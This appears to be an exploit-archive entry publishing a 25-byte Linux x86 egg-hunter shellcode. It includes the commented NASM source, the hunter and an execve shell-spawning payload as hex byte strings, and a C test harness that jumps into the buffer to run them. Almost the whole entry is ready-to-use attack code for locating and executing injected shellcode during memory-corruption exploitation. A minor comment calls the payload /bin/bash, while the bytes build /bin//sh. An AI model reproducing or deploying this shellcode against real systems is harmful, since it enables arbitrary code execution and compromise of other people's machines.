Linux/x86 - Egg-hunter Shellcode (25 bytes)



EKU-ID: 6091 CVE: OSVDB-ID:
Author: Filippo Bersani Published: 2016-11-28 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
;author: Filippo "zinzloun" Bersani
;date: 25/11/2016
;version 1.0
;purpose: different approach with fnstenv technique, changed the usual pattern to find the egg mark
;X86 Assembly/NASM Syntax
;tested on: Linux OpenSuse001 2.6.34-12-desktop 32bit
;           Linux ubuntu 3.13.0-100-generic #147~precise1-Ubuntu 32bit
 
 
global _start
section .text
_start:
 
 fldz                           ;with this 2 instructions...
 fnstenv [esp-0xc]              ;set the entry point of my egg (_start)
 
 pop esi                        ;get the entry point addr...
 lea esi,[esi+24]               ;the trick: move to pointer @ the last byte of this egg hunter
 
 mov edx, dword 0x65676760      ;a dumm value..
 rol edx, 0x4                   ;...to get the real egg mark: 56767606
 
find_egg:
 inc esi                        ;scan the next section of memory after this code
 cmp [esi], edx                 ;check if we have found the egg...
 jz find_egg                    ;loop
 call esi                       ;egg found (zero flag is set), jump to the address to exec the shell code
 */
 
#include<stdio.h>
#include<string.h>
 
unsigned char egg_hunter[] = \
"\xd9\xee\xd9\x74\x24\xf4\x5e\x8d\x76\x18\xba\x60\x67\x67\x65\xc1\xc2\x04\x46\x39\x16\x74\xfb\xff\xd6";
unsigned char shell_code[] = \
"\x06\x76\x76\x56" // egg id reversed
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"; // POC: /bin/bash
main()
{
        printf("Egg hunter length:  %d\n", strlen(egg_hunter));
        printf("Total length: %d\n", strlen(egg_hunter)+strlen(shell_code));
        int (*ret)() = (int(*)())egg_hunter;
        ret();
}